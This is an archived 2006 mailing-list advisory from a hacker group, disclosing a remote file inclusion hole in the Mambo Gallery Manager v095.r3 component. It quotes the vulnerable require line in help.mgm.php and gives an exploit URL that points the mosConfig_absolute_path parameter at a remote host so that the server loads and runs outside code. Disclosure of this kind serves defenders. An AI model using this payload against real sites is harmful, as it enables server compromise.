|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
A-S-T2006
hotmail.com
Date: Fri Jul 28 2006 - 16:48:45 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
----------------------------------------------------
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
site of script:http://mamboxchange.com/frs/?group_id=175&release_id=1289
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3(mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path . "/administrator/components/com_mgm/diagnostics.mgm.php";
$mosConfig_absolute_path File inclusion
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://evalcode.txt
----------------------------------------------------------------------------------------------------
Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,ALMOKAN3,Broken-proxy ,troq AND ALL LEZR.COM Member
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]